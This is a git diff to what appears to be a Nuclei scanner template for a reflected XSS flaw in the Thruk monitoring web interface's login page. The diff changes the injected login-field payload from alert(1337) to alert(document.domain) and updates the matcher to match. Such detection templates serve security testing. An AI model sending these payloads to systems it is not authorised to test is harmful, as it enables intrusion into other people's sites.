diff --git a/vulnerabilities/other/thruk-xss.yaml b/vulnerabilities/other/thruk-xss.yaml
index fba1e61e8c..ec056e3be3 100644
--- a/vulnerabilities/other/thruk-xss.yaml
+++ b/vulnerabilities/other/thruk-xss.yaml
@@ -4,6 +4,7 @@ info:
   name: Thruk Monitoring Webinterface - XSS
   author: pikpikcu
   severity: medium
+  reference: https://www.thruk.org/download.html
   tags: xss,thruk
 
 requests:
@@ -14,7 +15,7 @@ requests:
         Content-Type: application/x-www-form-urlencoded
         Referer: {{Hostname}}/thruk/cgi-bin/login.cgi?thruk
 
-        referer=%2Fthruk&login=--%3E%3C%2Fscript%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface
+        referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface
 
     matchers-condition: and
     matchers:
@@ -25,9 +26,9 @@ requests:
       - type: word
         part: body
         words:
-          - "<script>alert(1337)</script>"
+          - "</script><script>alert(document.domain)</script>"
 
       - type: word
         part: header
         words:
-          - "text/html"
\ No newline at end of file
+          - "text/html"